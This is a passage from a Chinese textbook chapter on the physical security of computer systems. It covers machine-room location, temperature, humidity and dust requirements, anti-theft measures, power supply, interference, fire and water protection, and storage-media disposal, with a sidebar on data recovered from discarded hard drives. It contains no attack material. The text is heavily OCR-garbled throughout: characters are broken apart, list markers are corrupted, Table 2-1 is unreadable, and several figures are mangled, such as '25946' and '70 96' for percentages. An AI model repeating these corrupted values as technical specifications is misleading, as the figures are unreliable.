信 线 路 的 物理 安全 ,是 整个 计算 机 信息 系统 安全 的 前 提 。 如 果 物 理 安全 得 不 到 保证 ,整个 计 
算 机 信息 系统 的 安全 也 就 不 可 能 实现 。 

物理 安全 是 保护 一 些 比较 重要 的 设备 不 被 接触 。 物 理 安 全 比较 难 防 , 因 为 攻击 者 往往 
是 来 自 能 够 接触 到 物理 设备 的 用 户 。 

2. 物理 安全 技术 定义 

物理 安全 技术 主要 是 指 对 计算 机 及 网 络 系 统 的 环境 、 场 地 ,设备 和 通信 线路 等 采取 的 安全 
技术 措施 。 物 理 安全 技术 实施 的 目的 是 保护 计算 机 、 网 络 服 务 器 、 打 印 机 等 硬件 实体 和 通信 设 
施 免 受 自然 灾害 、 人 为 失误 、 犯 罪行 为 的 破坏 ,确保 系统 有 一 个 良好 的 电磁 兼容 工作 环境 。 应 


建立 完备 的 安全 管理 制度 ,防止 非法 进入 计算 机 工作 环境 和 各 种 偷窃. 破坏 活动 的 发 和 


3. 影响 物理 安全 的 主要 因素 

A) 计算 机 及 其 网 络 系统 自身 存在 的 脆弱 性 因素 。 
COD 各 种 自然 灾害 导致 的 安全 问题 。 

CD. 由 于 人 为 的 错误 操作 及 各 种 计算 机 犯罪 导致 的 安全 问题 。 
4. 物理 安全 的 内 容 
物理 安全 包括 环境 安全 ,设备 安全 、 电 源 系统 安全 和 通信 线路 安全 。 具 体 参 见 1. 3. 1 小节 。 


22 环境 安全 


HT 


计算 机 系统 是 由 大 量 电子 设备 和 机 械 设备 组 成 的 ,计算 机 的 运行 环境 对 计算 机 的 影响 非 
常 大 ,环境 影响 因素 主要 有 温度 .湿度 .灰尘 腐蚀 .电气 与 电磁 干扰 等 。 这 些 因素 从 不 同 侧 面 
影响 计算 机 的 可 靠 工 作 。 因 此 ,计算 机 机 房 的 环境 条 件 是 计算 机 可 靠 安全 运行 的 重要 因素 之 一 。 

1. 环境 安全 的 目的 

为 计算 机 系统 提供 合适 的 安全 环境 有 如 下 3 个 目的 。 

CD 充分 发 挥 计 算 机 系统 的 性 能 ,确保 其 可 靠 安全 地 运行 。 

(2) 延长 计算 机 系统 的 使 用 寿命 。 

(3) 确保 工作 人 员 的 身心 健康 ,提高 工作 效率 。 

实践 表明 ,有 些 计 算 机 系统 运行 不 稳定 或 者 经 常 出 错 , 除 了 机 器 本 身 的 原因 之 外 ,计算 
机 机 房 环境 条 件 是 一 个 重要 因素 。 因 此 ,要 充分 认识 机 房 环 境 条 件 的 作用 和 影响 ,确保 计算 


机 机 房 的 环境 安全 。 


2. 计算 机 机 房 安 全 要 求 


计算 机 系统 中 的 各 种 数据 依据 其 重要 性 和 保密 性 ,可 以 划分 为 3 个 不 同 的 等 级 。 

COD A 级; 对 计算 机 机 房 的 安全 有 严格 的 要 求 ,有 完善 的 计算 机 机 房 安全 措施 。 

(2) BR: 对 计算 机 机 房 的 安全 有 较 严 格 的 要 求 ,有 较 完 善 的 计算 机 机 房 安全 措施 。 

(3) C 级 : 对 计算 机 机 房 的 安全 有 基本 的 要 求 ,有 基本 的 计算 机 机 房 安全 措施 。 

建设 机 房 时 应 该 根据 所 处 理 的 信息 以 及 运用 场合 的 重要 程度 来 选择 适合 本 系统 特点 的 
安全 等 级 ,而 不 应 该 要 求 机 房 都 达到 某 一 安全 级 别 的 所 有 要 求 。 

计算 机 机 房 安全 要 求 的 详细 情况 见 表 2-1。 


表 2-1 计算 机 机 房 安 全 要 求 


安全 类 别 安全 类 别 

安全 项 上 A ZHL |B ROL |C 类 机 房 安全 项 目 A RHL |B RHL |C 类 机 房 
场地 选择 一 供 配 电 系统 t 一 一 

内 部 装修 * = 防 静 电 t x 

防水 十 Es 防 雷击 十 

防火 防 鼠 害 十 m 

空调 系统 十 防 电磁 泄漏 = 

火灾 报警 和 消防 设施 + 


注 :“ 十 "表示 要 求 ,“ 一 "表示 有 要 求 或 增加 要 求 。 
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3. 计算 机 机 房 的 外 部 环境 要 求 

计算 机 机 房 场地 的 选择 应 以 能 否 保 证 计算 机 长 期 稳定 、 可 靠 、 安 全 的 工作 为 主要 目标 ， 
所 以 对 计算 机 机 房 的 外 部 环境 有 如 下 要 求 。 

(1) 应 该 考虑 环境 安全 性 、 地 质 可 靠 性 、 场 地 抗 电磁 干扰 性 。 

(2) 应 该 避 开 强 振动 源 和 强 噪 声 源 。 

(3) 应 避免 设 在 建筑 物 的 高 层 以 及 用 水 设备 的 下 层 或 隔壁 ,这 是 因为 底层 一 般 较 潮湿 ， 
而 顶层 有 漏 雨 、 穿 窗 而 和 的 危险 。 

(4) 应 该 尽量 选择 电力 ,水 源 充足 ,环境 清洁 ,交通 和 通信 方便 的 地 方 。 

C5) 对 机 要 部 门 信息 系统 的 机 房 , 还 应 考虑 机 房 中 的 信息 射频 不 易 被 泄露 和 窃取 。 

(6) 机 房 方圆 半径 100m 内 不 能 有 危险 建筑 物 , 如 加 油 站 、 煤 气 站 、 天 然 气 或 煤气 管道 
和 散发 有 强烈 腐蚀 气体 的 设施 .工厂 等 。 

(7) 电梯 和 楼 梯 不 能 直接 进入 机 房 。 

(8) 建筑 物 周围 应 有 足够 亮度 的 照明 设施 和 防止 非法 进入 的 设施 。 

(9) 外 部 容易 接近 的 进出 口 , 如 风 道 口 、 排 风口 、 窗 户 、 应 急 门 等 应 有 栅栏 或 监控 措施 ， 
必要 时 安装 自动 报警 设备 。 

4. 计算 机 机 房 内 部 环境 要 求 

对 计算 机 机 房 的 内 部 环境 有 如 下 要 求 。 

CD. 机 房 应 辟 为 专用 和 独立 的 房间 。 

(20 经 常 使 用 的 进出 口 应 限于 一 处 ,以 便于 出 人 管理 。 

(3) 机 房 内 应 留 有 必要 的 空间 ,其 目的 是 确保 灾害 发 生 时 人 员 和 设备 的 撤离 和 维护 。 

(4) 在 较 大 的 楼 层 内 ,计算 机 机 房 应 靠近 楼 梯 的 一 边 。 这 样 既 便于 安全 警卫 ,又 利于 发 
生火 灾 险 情 时 的 转移 撤离 。 

(5) 应 当 保 证 所 有 进出 计算 机 机 房 的 人 都 必须 在 管理 人 员 的 监控 之 下 。 外 来 人 员 一 般 
不 允许 进入 机 房 内 部 ,对 于 在 特殊 情况 下 需要 进入 机 房 内 部 的 人 员 ,应 办 理 相关 手续 ,并 对 
来 访 者 的 随身 物品 进行 相应 的 检查 。 

(6) 机 房 供 电 系统 应 将 动力 照明 用 电 与 计算 机 系统 供电 线路 分 开 , 机 房 及 踢 散 通 道 要 
安装 应 急 照明 装置 。 

(7) 照明 应 达到 规定 标准 。 

另外 ,采用 物理 防护 手段 ,建立 物理 屏障 ,阻止 非法 入 侵 接近 计算 机 系统 ,是 行 之 有 效 的 
防护 措施 ,这 些 措施 有 出 入 识别 、 区 域 隔离 和 边界 防护 等 。 出 入 识别 已 从 早期 的 专人 值守 、 
验证 口令 等 发 展 为 密码 锁 、 磁 卡 识别 .指纹 识别 .视网膜 识别 和 语音 识别 等 多 种 手段 的 身份 
识别 措施 。 区 域 隔 离 和 边界 防护 是 将 重要 的 计算 机 系统 周围 构造 安全 警戒 区 ,边界 设置 障 
碍 ,区 内 采取 重点 防范 ,甚至 昼夜 警戒 ,将 入侵 者 阻拦 在 警戒 区 以 外 。 

5. 计算 机 机 房 环 境 温度 要 求 

计算 机 的 电子 元 器 件 .芯片 都 密封 在 机 箱 中 .有 的 芯片 工作 时 表面 温度 相当 高 ,一 般 电 
子 元 器 件 的 工作 温度 范围 是 0C — 45"C ,统计 数据 表明 , 当 环境 温度 超过 规定 范围 (60C ) 
时 ,计算 机 系统 就 不 能 正常 工作 。 温 度 每 升 高 10C .电子 元 器 件 的 可 靠 性 就 会 降低 25946. 
元 器 件 可 靠 性 降低 无 疑 将 影响 计算 机 的 正确 运算 ,影响 结果 的 正确 性 。 

温度 对 磁 介 质 的 磁 导 率 影响 很 大 ,温度 过 高 或 过 低 都 会 使 磁 导 率 降低 ,影响 磁头 读 写 的 
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正确 性 。 温 度 还 会 使 磁带 \ 磁 盘 表 面 热 胀 冷 缩 发 生变 化 ,造成 数据 的 读 写 错误 ,影响 信息 的 
正确 性 。 温 度 过 高 会 使 插头 、 插 座 、 计 算 机 主板 、 各 种 信号 线 腐蚀 速度 加 快 ,容易 造成 接触 不 
良 ,温度 过 高 也 会 使 显示 器 各 线圈 骨架 尺寸 发 生变 化 ,使 图 像 质量 下 降 。 温 度 过 低 会 使 绝缘 
材料 变 硬 、 变 脆 , 使 漏电 电流 增 大 ,使 磁 记 录 媒 体 性 能 变 差 ,同时 也 会 影响 显示 器 的 正常 工 
作 。 在 有 条 件 的 情况 下 ,最 好 将 计算 机 放置 在 有 空调 的 房间 内 。 机 房 温度 最 好 控制 在 
15C ~35°C。 

6. 计算 机 机 房 环 境 湿 度 要 求 

放置 计算 机 的 房间 内 ,湿度 最 好 保持 在 40% 一 60% ,湿度 过 高 或 过 低 对 计算 机 的 可 靠 
性 与 安全 性 都 有 影响 。 

(1) 湿度 过 高 

当 相 对 湿度 超过 70 96 ,会 在 元 器 件 的 表面 附着 一 层 很 薄 的 水 膜 ,使 计算 机 内 的 元 器 件 
受潮 变质 ,会 造成 元 器 件 各 引 脚 之 间 的 漏电 .出现 电弧 现象 ,甚至 会 发 生 短路 而 损坏 机 器 。 

当 水 膜 中 含有 杂质 时 ,它们 会 附着 在 元 器 件 引 脚 .导线 .接头 表面 ,会 造成 这 些 表面 发 霉 
和 和 触 点 腐蚀 ,引起 电气 部 分 绝缘 性 能 下 降 。 湿 度 过 大 还 会 使 灰尘 的 导电 性 能 增强 ,电子 器 件 
失效 的 可 能 性 也 随 之 增 大 。 

湿度 过 高 ,打印 纸 会 吸 潮 变 厚 ,也 会 影响 正常 的 打印 操作 。 

(2) 湿度 过 低 

相对 湿度 不 能 低 于 20 2 ,否则 会 因 过 分 干燥 而 产生 静电 干扰 ,引起 计算 机 的 错误 动作 。 

另外 ,相对 湿度 过 低 则 会 导致 计算 机 网 络 设备 中 的 某 些 元 器 件 龟 裂 , 印 制 电路 板 变 形 ， 
特别 是 静电 感应 增加 ,会 使 计算 机 内 存储 的 信息 丢失 或 异常 ,严重 时 还 会 导致 芯片 损坏 ,给 
计算 机 系统 带 来 严重 危害 。 

总 之 ,如 果 对 计算 机 运行 环境 没有 任何 控制 ,温度 与 湿度 高 低 交 替 大 幅度 变化 ,会 加 速 
对 计算 机 中 各 种 元 器 件 与 材料 的 腐蚀 与 破坏 ,严重 影响 计算 机 的 正常 运行 与 使 用 寿命 。 所 
以 ,机 房 内 的 相对 湿度 最 好 控制 在 40 96 — 6096 ,机 房 温度 最 好 控制 在 15C 一 35C 。 湿 度 控 
制 与 温度 控制 最 好 都 与 空调 联系 在 一 起 ,由 空调 系统 集中 控制 。 机 房 内 应 安装 温度 ,湿度 显 
示 仪 ,以 便 随时 进行 观察 和 监测 。 

7. 计算 机 机 房 洁净 度 要 求 

洁净 度 是 对 悬浮 在 空气 中 尘埃 颗粒 的 大 小 与 含量 的 要 求 , 对 于 机 房 的 洁净 度 而 言 ,要 求 
尘埃 颗粒 直径 小 于 0. 5pm, 每 升 空气 平均 含 尘 量 应 少 于 10000 颗 。 如 果 机 房 内 灰尘 过 多 ,会 
缩短 计算 机 的 寿命 。 

灰尘 对 计算 机 中 的 精密 机 械 装置 (如 光盘 驱动 器 ) 影 响 很 大 .光盘 机 的 读 头 与 盘 片 之 间 
的 距离 很 小 ,在 高 速 旋转 过 程 中 ,各 种 灰尘 ,其 中 包括 纤维 性 灰尘 会 附着 在 盘 片 表面 , 当 读 信 
号 时 ,可 能 擦 伤 盘 片 表面 或 者 磨损 读 头 ,造成 数据 读 写 错误 或 数据 丢失 。 

如 果 灰 侍 中 还 包括 导电 尘埃 和 腐蚀 性 尘埃 ,那么 它们 会 附着 在 元 器 件 与 电子 线路 的 表 
面 ,车 此 时 机 房 空气 湿度 较 大 ,会 造成 短路 或 腐蚀 裸露 的 金属 表面 。 灰 尘 在 元 器 件 表面 的 堆 
积 , 会 造成 接 插 件 的 接触 不 良 、 发 热 元 器 件 的 散热 能 力 降低 、 电 气 元 器 件 的 绝缘 性 能 下 降 。 

因此 ,计算 机 机 房 必须 有 除尘 、 防 尘 的 设备 和 措施 ,保持 清洁 卫生 ,以 保证 设备 的 正常 工 
作 。 对 进入 机 房 的 新 鲜 空 气 应 进行 一 次 或 两 次 过 滤 ,要 采取 严格 的 机 房 卫生 制度 ,降低 机 房 
18 


第 2 章 ”实体 和 基础 设施 安全 


上 述 5 一 7 条 , 合 起 来 被 称 为 机 房 三 度 ( 温 度 、 湿 度 和 洁净 度 ) 要 求 ,所 以 ,为 保证 计算 机 
网 络 系统 的 正常 运行 ,要 根据 三 度 要 求 来 建设 ,维护 和 管理 机 房 。 

CD 制定 合理 的 清洁 卫生 制度 ,禁止 在 机 房 内 吸烟 , 吃 东西 LS RA: LAUR o 

(2) 在 机 房 内 要 禁止 放 食物 ,以 防止 老鼠 或 其 他 昆虫 损坏 电源 线 和 记录 介质 等 设备 。 

(3) 机 房 内 严禁 存放 腐蚀 物质 ,以 防 计 算 机 设备 受 大 气 腐蚀 .电化 腐蚀 或 直接 被 氧化 、 
腐蚀 、 生 锈 及 损坏 。 

(4) 在 设计 和 建造 机 房 时 ,必须 考虑 到 振动 .冲击 的 影响 ,还 需要 避免 各 种 干扰 (噪声 干 
扰 、 电 气 干扰 和 电磁 干扰 )。 

8. 计算 机 机 房 防盗 要 求 

在 机 房 中 服务 器 系统 的 磁盘 或 光盘 上 ,存放 重要 的 应 用 软件 、 业 务 数据 或 者 机 密 信 息 
等 ,这 些 设备 本 身 及 其 内 部 存储 的 信息 都 是 非常 重要 的 ,一 旦 丢失 或 被 资 ,将 产生 极其 严重 
的 后 果 。 因 此 ,对 重要 的 设备 和 存储 介质 应 该 采取 严格 的 防盗 措施 。 

COD 增加 重量 和 进行 胶 粘 。 这 是 早期 主要 采取 的 防盗 措施 .将 重要 的 计算 机 网 络 设备 
永久 地 固定 或 黏 结 在 某 个 位 置 上 。 虽 然 该 方法 增强 了 设备 的 防盗 能 力 , 但 是 却 给 设备 的 移 
动 或 调整 位 置 带 来 不 便 。 

(2) 加 锁 。 将 设备 与 固定 底盘 用 锁 连 接 , 只 有 将 锁 打 开 才 可 移动 设备 。 比 如 某 些 笔记 
本 电脑 采用 机 壳 加 锁 扣 的 防盗 方法 。 

(3) 光纤 电缆 。 将 每 台 重 要 的 设备 通过 光纤 电缆 串 接 起 来 ,并 使 光束 沿 光 纤 传 输 , 如 果 
光束 传输 受阻 , 则 自动 报警 。 该 保护 装置 比较 简便 ,一 套装 置 可 以 保护 机 房 内 的 所 有 重要 设 
备 ,并 且 不 影响 设备 的 可 移动 性 。 

(4) 磁性 标签 。 在 需要 保护 的 重要 设备 .存储 介质 和 硬件 上 贴 上 磁性 标签 , 当 有 人 非法 
携带 这 些 重要 设备 或 物品 外 出 时 ,检测 器 就 会 发 出 报警 信号 。 

(5) 视频 监视 系统 。 视 频 监 视 系 统 能 对 计算 机 网 络 系统 的 外 围 环境 、 操 作 环 境 进 行 实 
时 全 程 监控 ,是 一 种 更 为 可 靠 的 防盗 设备 措施 。 

对 重要 的 机 房 , 还 应 采取 特别 的 防盗 措施 .如 值班 守卫 、 出 入 口 安装 金属 探测 装置 等 。 

9. 计算 机 机 房 电 源 要 求 

计算 机 对 电源 有 两 个 基本 要 求 : 电压 要 稳 .在 机 器 工作 时 供电 不 能 间断 。 

电压 不 稳 不 仅 会 对 显示 器 和 打印 机 的 工作 造成 影响 ,而且 还 会 造成 磁盘 驱动 器 运行 不 
稳定 ,从 而 引起 数据 的 读 写 错误 。 

为 了 获得 稳定 的 电压 ,可 以 使 用 交流 稳 压 电源 。 

为 了 防止 突然 断 电 对 计算 机 工作 造成 影响 ,在 要 求 较 高 的 应 用 场合 ,应 该 装备 不 间断 供 
电 电 源 (UPS) ,以 便 断 电 后 能 使 计算 机 继续 工作 一 小 段 时 间 ,使 操作 人 员 能 及 时 处 理 完 计算 
工作 或 保存 数据 。 

10. 计算 机 机 房 电 气 与 电磁 干扰 

电气 与 电磁 干扰 是 指 电 网 电压 和 计算 机 内 外 的 电磁 场 引起 的 干扰 。 

常见 的 电气 干扰 是 指 电压 的 瞬间 较 大 幅度 的 变化 、 突 发 的 尖 脉 冲 或 电压 不 足 甚至 掉 电 。 
例如 ,计算 机 机 房 内 使 用 较 大 功率 的 吸 侍 器 .电钻 ,机 房 外 使 用 电 锯 .电焊 机 等 大 用 电量 设 
备 , 这 些 情况 都 容易 在 附近 的 计算 机 电源 中 产生 电气 噪声 信号 干扰 。 

这 些 干扰 一 般 容易 破坏 信息 的 完整 性 .有 时 还 会 损坏 计算 机 设备 。 


防止 电气 干扰 的 办 法 是 采用 稳 压 电源 或 不 间断 电源 ,为 了 防止 突 发 的 电源 尖 脉 冲 ,对 电 
源 还 要 增加 滤波 和 隔离 措施 。 

另外 , 当 计 算 机 正在 工作 时 ,在 机 房 内 应 尽量 避免 使 用 电炉 ,电视 或 其 他 强 电 设备 ,空调 
设备 的 供电 系统 与 计算 机 供电 系统 应 是 相对 独立 的 系统 。 

对 计算 机 正常 运转 影响 较 大 的 电磁 干扰 是 静电 干扰 与 周边 环境 的 强 电磁 场 干扰 。 由 于 
计算 机 中 的 芯片 大 部 分 都 是 MOS 器 件 , 静 电 电压 过 高 会 破坏 这 些 MOS 器 件 , 据 统计 ,50% 
以 上 的 计算 机 设备 的 损害 直接 或 间接 与 静电 有 关 。 

防 静 电 的 主要 方法 有 以 下 两 种 。 

(1) 机 房 应 该 按 防 静 电 要 求 装修 ,比如 使 用 防 静 电 地 板 。 

(2) 整个 机 房 应 该 有 一 个 独立 的 和 良好 的 接地 系统 ,机 房 中 各 种 电气 和 用 电 设 备 都 接 
在 统一 的 地 线 上 。 

周边 环境 的 强 电 磁场 干扰 主要 指 可 能 的 无 线 电 发 射 装置 .微波 线路 、 高 压 线路 ,电气 化 
铁路 、 大 型 电机 、 高 频 设备 等 产生 的 强 电 磁 干 扰 。 这 些 强 电磁 干扰 轻 则 会 使 计算 机 工作 不 稳 
定 , 重 则 对 计算 机 造成 损坏 。 

11. 计算 机 机 房 防火 要 求 

引起 计算 机 机 房 火灾 的 原因 一 般 有 : 电气 原因 、 人 为 事故 和 外 部 火灾 蔓延 。 

CD 电气 原因 : 是 指 电气 设备 和 线路 的 短路 、 过载、 接触 不 良 、 绝 缘 层 破损 或 静电 等 原 
因 导 致电 打 火 而 引起 的 火灾 。 

(2) 人 为 事故 : 是 指 由 于 计算 机 机 房 人 员 不 慎 ,吸烟 并 且 乱 扔 烟头 等 不 良 习惯 ,使 充满 
易 燃 物质 的 机 房 起 火 。 

G) 外 部 火灾 蔓延 , 是 指 因 外 部 房间 或 其 他 建筑 物 起 火 而 蔓延 到 机 房 而 引起 机 房 起 火 。 

机 房 内 应 有 防火 措施 。 如 机 房 内 应 有 火灾 自动 报警 系统 ,机 房 内 应 放置 适用 于 计算 机 
机 房 的 灭火 器 ,并 建立 应 急 计 划 和 防火 制度 等 。 为 避免 火灾 ,应 采取 如 下 具体 措施 。 

(1) 隔离 。 计 算 机 机 房 四 周 应 该 设计 一 个 隔离 带 。 系 统 中 特别 重要 的 设备 应 该 尽量 与 
人 员 频 繁 出 入 的 地 区 和 堆积 易 燃 物 的 区 域 隔离 。 所 有 机 房 的 房 门 应 该 为 防火 门 , 外 层 要 有 
金属 蒙 皮 。 机 房 内 部 应 用 阻 燃 材料 装修 。 

(2) 火灾 报警 系统 。 火 灾 报 警 系统 的 作用 是 在 火灾 初期 就 能 检测 到 并 及 时 发 出 警报 。 
火灾 报警 系统 按 传感器 的 不 同 , 分 为 烟 报 警 和 热 敏 式 温度 报警 两 种 类 型 。 

烟 报警 器 在 火灾 开始 的 发 烟 阶 段 就 会 检测 出 火灾 ,并 发 出 警报 。 它 的 动作 快 ,可 使 火灾 
及 时 被 发 觉 。 

热 敏 式 温度 报警 器 是 在 火灾 发 生 ,温度 升 高 后 发 出 报警 信和 号。 

近年 来 还 开发 出 一 种 新 型 的 CD 探测 报警 器 , 它 在 有 烟 的 初期 即 可 探测 到 火灾 的 发 生 ， 
从 而 避免 各 种 损失 , 且 可 避免 人 员 因 缺 氧 而 死亡 。 

为 安全 起 见 ,机房 应 配备 多 种 火灾 自动 报警 系统 ,并 保证 在 断 电 后 24 小 时 之 内 仍 能 发 
出 警报 。 报 警 器 可 以 采用 音响 或 灯光 报警 ,一 般 安 放 在 值班 室 或 人 员 集 中 处 ,以 便 工 作 人 员 
及 时 发 现 并 向 消防 部 门 报告 组织 人 员 朴 散 等 。 

(3) 灭火 设施 。 计 算 机 机 房 内 应 该 配置 灭火 器 材 , 机 房 所 在 楼 层 应 该 备 有 防火 栓 、 灭 火 
器 材 和 工具 ,这 些 设施 应 具有 明显 的 标记 . 且 需 要 定期 检查 。 主 要 的 消防 器 材 和 工具 包括 以 
下 两 种 。 
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QD 灭火器。 虽然 机 房 建筑 内 要 求 有 自动 喷 水 、 供 水 系统 和 各 种 灭火 器 ,但 并 不 是 任何 
机 房 火灾 都 可 以 自动 喷 水 的 ,因为 有 时 对 设备 的 二 次 破坏 比 火灾 本 身 造成 的 损坏 更 为 严重 。 
因此 ,灭火 器 材 最 好 使 用 气体 灭火 器 ,推荐 使 用 不 会 造成 二 次 污染 的 贞 代 烷 1211 或 1301 K 
火器 ,如 无 条 件 , 也 可 使 用 二 氧化 碳 灭火 器 。 同 时 ,还 应 有 手持 式 灭火 器 ,用 于 大 设备 灭火 。 
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(4) 管理 措施 。 机 房 应 制订 完善 的 应 急 计 划 和 相关 制度 ,并 严格 执行 计算 机 机 房 环 境 
和 设备 维护 的 各 项 规章 制度 。 加 强 对 火灾 隐患 部 位 的 检查 ,如 电源 线路 要 经 常 检 查 是 否 有 
短路 处 ,防止 出 现 火花 引起 火灾 。 要 制订 灭火 的 应 急 计 划 并 对 所 属 人 员 进 行 培训 。 此 外 还 
应 定期 对 防火 设施 和 工作 人 员 的 掌握 情况 进行 测试 。 

12. 计算 机 机 房 防水 要 求 

计算 机 机 房 的 水 灾情 况 一 般 是 由 机 房 内 渗水 、 漏 水 等 原因 引起 的 。 因 此 ,机 房 内 应 该 有 
防水 措施 。 比 如 机 房 内 应 该 有 水 灾 自 动 报警 系统 ,还 应 该 有 排水 装置 ,另外 ,如 果 机 房 上 层 
有 用 水 设施 , 则 需要 加 防水 层 。 


23 设备 安全 
计算 机 信息 系统 的 硬件 设备 一 旦 被 损坏 又 不 能 及 时 修复 ,不 仅 会 造成 经 济 损失 ,而 且 可 


能 导致 整个 系统 瘫痪 ,产生 严重 的 后 果 。 因 此 ,必须 加 强 对 计算 机 信息 系统 硬件 设备 的 使 用 
管理 ,坚持 做 好 硬件 设备 的 日 常 维护 和 保养 工作 。 

1. 硬件 设备 的 使 用 管理 

(1) 要 根据 硬件 设备 的 具体 配置 情况 ,制定 切实 可 行 的 硬件 设备 的 操作 使 用 规程 ,并 严 
格 按 操作 规程 进行 操作 。 

(2) 建立 设备 使 用 情况 日 志 , 并 严格 登记 使 用 过 程 中 出 现 的 情况 。 

(3) 建立 硬件 设备 故障 情况 登记 表 , 详 细 记 录 故 障 性 质 和 修复 情况 。 

(4) 坚持 对 设备 进行 例 行 维护 和 保养 ,并 指定 专人 负责 。 

2. 常用 硬件 设备 的 维护 和 保养 

常用 硬件 设备 的 维护 和 保养 包括 以 下 方面 。 

CD 对 主机 、 显 示 器 打印机、 硬盘 的 维护 保养 。 

(2) 对 网 络 设备 ,如 Modem、HUB、 交 换 机 、 路 由 器 、 网 络 线 缆 、RJ-45 接头 等 的 维护 
保养 。 

(3) 对 供电 系统 的 各 种 保护 装置 以 及 地 线 进 行 定 期 检查 。 

所 有 计算 机 信息 系统 的 设备 都 应 当 置 于 上 锁 且 有 空调 的 房间 里 ,还 要 将 对 设备 的 物理 
访问 权限 限制 在 最 小 范围 内 。 

3. 信息 存储 介质 的 安全 管理 

计算 机 系统 的 信息 存储 在 某 种 存储 介质 上 ,常用 的 存储 介质 有 了 磁带、 硬盘 、 光 盘 . 打 印 纸 
等 。 对 存储 介质 的 安全 管理 主要 包括 以 下 方面 。 

CD 存放 有 业务 数据 或 程序 的 磁盘 、 磁 带 或 光盘 ,应 妥善 保管 .必须 注意 防磁 、 防 潮 、 防 
火 和 防盗 。 
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(2) 对 硬盘 上 的 数据 ,要 建立 有 效 的 级 别 、 权 限 , 并 严格 管理 ,必要 时 要 对 数据 进行 加 
密 , 以 确保 硬盘 数据 的 安全 。 

(3) 存放 业务 数据 或 程序 的 磁盘 、 磁 带 或 光盘 ,管理 必须 落实 到 人 ,并 分 类 建立 登记 禾 ， 
记录 编号 .名 称 、 用 途 、 规 格 、 制 作 日 期 有 有效期、 使 用 者 、 批 准 者 等 信息 。 

OD 对 存放 有 重要 信息 的 磁盘 、 磁 带 、 光 盘 , 要 备份 两 份 并 分 两 处 保管 。 

(5) 打印 有 业务 数据 或 程序 的 打印 纸 , 要 视 同 档案 进行 管理 。 

(6) 对 需要 长 期 保存 的 有 效 数据 .应 在 磁盘 、 磁 带 、 光 盘 的 质量 保证 期 内 进行 转 储 , 转 储 
时 应 确保 内 容 正确 。 

(7) 凡 超过 数据 保存 期 的 磁盘 、 磁 带 、 光 盘 , 必 须 经 过 特殊 的 数据 清除 处 理 , 视 同 空白 磁 


盘 、 磁 带 、 光 盘 。 
(8) 凡 不 能 正常 记录 数据 的 磁盘 、 磁 带 、 光 盘 , 必 须 经 过 测试 确认 后 由 专人 进行 销毁 ,并 
做 好 登记 工作 。 


香港 影星 的 艳照 门 事件 令 人 震惊 ,关于 艳照 的 来 源 , 网 上 流传 两 种 说 法 ,一 种 是 说 在 维 
修 计算 机 时 照片 被 人 盗 取 ,二 是 说 黑客 人 侵 了 个 人 计算 机 。 反 病毒 专家 认为 ,艳照 的 来 源 最 
有 可 能 的 是 来 自 被 废弃 的 硬盘 。 一 般 计 算 机 用 户 在 处 理 废弃 计算 机 时 十 分 随便 ,以 为 只 要 
将 计算 机 硬盘 内 的 数据 格式 化 就 可 以 了 ,其 实 格式 化 后 的 数据 还 原封 不 动 地 保留 在 硬盘 内 ， 
稍 懂 数 据 恢复 技术 的 人 就 可 以 轻易 恢复 这 些 数据 。 目 前 我 国 已 经 出 现 一 批 专门 通过 恢复 废 
弃 硬盘 内 有 价值 信息 并 出 售 获 利 的 人 群 ,他 们 往往 通过 在 废品 市 场 购买 或 从 单位 回收 旧 计 
算 机 设备 ,然后 将 硬盘 内 的 信息 恢复 ,将 有 价值 的 信息 出 售 ,以 此 获得 比 硬盘 本 身价 值 更 大 
的 利益 。 所 以 ,为 了 避免 类 似 事 件 的 发 生 , 计 算 机 用 户 在 删除 文件 以 及 处 理 废 弃 计算 机 时 ， 
一 定 要 对 文件 和 计算 机 硬盘 进行 不 可 恢复 性 处 理 ,比如 在 处 理 重要 文件 时 ,使 用 某 些 工具 软 
件 的 “文件 粉碎 ”功能 ,对 文件 进行 彻底 地 不 可 恢复 性 粉碎 ; 在 处 理 废弃 硬盘 时 ,一定 要 把 硬 
盘 内 的 盘 片 打 孔 或 毁坏 ,以 防 硬盘 内 的 数据 被 不 法 分 子 盗 取 。 
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电源 是 计算 机 网 络 系统 的 命脉 ,电源 系统 的 稳定 可 靠 是 计算 机 网 络 系统 正常 运行 的 先 
决 条 件 。 电 源 系 统 电压 的 波动 、 浪 涌 电 流 和 突然 断 电 等 意外 情况 的 发 生还 可 能 引起 计算 机 
系统 存储 信息 的 丢失 、 存 储 设备 的 损坏 等 情况 的 发 生 , 电 源 系统 的 安全 是 计算 机 系统 物理 安 
全 的 一 个 重要 组 成 部 分 。 因 此 ,为 保证 计算 机 及 其 网 络 系统 的 正常 工作 ,首先 要 保证 正常 供 
电 。 通 过 一 系列 的 保护 措施 ,如 采用 稳 压 电 源 、 不 间断 电源 、 应 急 发 电 设备 等 。 

电源 系统 安全 不 仅 包括 外 部 供电 线路 的 安全 ,更 重要 的 是 指 室内 电源 设备 的 安全 。 

1. 电源 对 用 电 设备 安 全 的 潜在 威胁 

理想 的 直流 电源 应 提供 纯净 的 直流 ,然而 总 有 一 些 干 扰 存 在 ,比如 在 开关 电源 输出 端口 
释 加 的 脉动 电流 和 高 频 振荡 。 这 两 种 干扰 再 加 上 电源 本 身 产生 的 尖峰 噪声 ,使 电源 出 现 断 
续 和 随意 的 漂移 。 另 外 ,电磁 干扰 会 产生 电磁 兼容 性 问题 , 当 电 源 的 电磁 干扰 比较 强 时 ,其 
产生 的 电磁 场 就 会 影响 到 硬盘 等 磁性 存储 介质 ,时间 长 了 就 会 使 存储 的 数据 受到 损害 。 电 
磁 干 扰 还 可 以 通过 设备 的 电源 端子 传导 发 射 , 造 成 电网 的 污染 。 信 息 设备 在 工作 时 也 会 向 
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空间 辐射 电磁 波 , 这 产生 了 对 其 他 设备 的 不 良 影响 ,特别 是 对 无 线 接收 设备 的 影响 很 大 。 

此 外 , 当 电 源 输出 的 直流 电压 中 摊 杂 了 过 多 的 交流 成 分 ,就 会 使 主板 、 内 存 、 显 卡 等 半 导 
体 元 器 件 不 能 正常 工作 ,而 且 当 市 电 有 和 较 大 波动 时 ,电源 输出 电压 产生 大 的 变化 ,还 有 可 能 
导致 计算 机 和 网 络 设 备 重新 启动 或 不 能 正常 工作 。 

2. 电力 能 源 的 可 靠 供 应 

为 了 确保 电力 能 源 的 可 靠 供应 ,以 防 外 部 供电 线路 发 生意 外 故障 ,必须 有 详细 的 应 急 预 
案 和 可 靠 的 应 急 设 备 。 应 急 设 备 主要 包括 : 备用 发 电机 、 大 容量 蓄电池 和 UPS 等 。 除 了 要 
